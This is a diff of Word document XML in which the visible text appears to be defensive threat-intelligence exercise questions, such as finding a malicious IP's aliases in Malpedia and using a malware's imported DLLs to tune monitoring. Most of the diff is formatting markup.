+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>security</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>planning</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>for</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>future</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>and</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>prioritizing</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>resources</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>based</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>on</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>threat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Can </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>you</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>provide</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>different</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3287,7 +5297,97 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>uses</w:t>
+        <w:t>alias</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>associated</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>with</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>malicious</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> IP </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>address</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>according</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -3302,55 +5402,21 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>steal</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>user’s</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>password</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>.</w:t>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Malpedia</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3368,10 +5434,10 @@
           <w:szCs w:val="26"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E8F8EF5" wp14:editId="33689F47">
-            <wp:extent cx="5943600" cy="2765425"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76131A48" wp14:editId="521054E8">
+            <wp:extent cx="5943600" cy="2880360"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="1247633420" name="Picture 1"/>
+            <wp:docPr id="1645467008" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -3379,7 +5445,608 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1247633420" name=""/>
+                    <pic:cNvPr id="1645467008" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="2880360"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Top of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Bottom of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Q9</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>By</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>identifying</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>malware's</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>imported</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>DLLs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>we</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> can </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>configure</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>security</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>tools</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>monitor</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>for</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>loading</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>or</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>unusual</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>usage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>of</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>these</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>specific</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
